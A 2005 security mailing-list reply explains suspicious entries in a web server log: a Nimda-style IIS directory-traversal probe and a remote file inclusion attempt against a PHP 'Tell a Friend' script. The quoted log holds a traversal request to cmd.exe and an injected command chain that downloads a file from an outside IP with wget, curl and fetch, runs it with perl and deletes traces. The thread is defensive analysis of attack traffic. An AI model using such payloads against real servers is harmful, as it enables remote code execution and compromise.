Fwd: GET //awstats.pl? in apache logs

[Tobias Hahn <tobi_wan () gmx de>]

Hi Brad,

On 10/24/05, mail list <brad.maillist () gmail com> wrote:
> 2005-10-21 14:18:09 192.168.2.100 GET
> /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir 80 - 66.7.71.83 - 404 0 64
this is some Nimda variant scanning for vulnerable IIS webservers.
http://www.cert.org/advisories/CA-2001-26.html

 I don't know what the second entry is about, but the third entry is
an attempt to use a vulnerability which was reported in the
STADTAUS.com 'Tell a Friend Script' software. As long as you're not
running this software or running the newest version you should be
fine.
http://securitytracker.com/alerts/2005/Mar/1013390.html

Tobias

> 2005-10-21 02:09:22 192.168.2.100 GET /web-hints/env.cgi - 80 - 58.51.133.21
> Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 404 0 3
>
> As well as a number of long entries such as the following.
>
> 2005-10-23 08:59:10 192.168.2.100 GET /inc/tell_a_friend.inc.php
> script_root=http://82.165.168.163/catalog/images/fbi.gif?&cmd=cd%20/tmp;wget
> %20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20
> -
> O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%
> 20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;perl%20s
> ess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* 80 - 211.38.128.10
> Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 200 0 0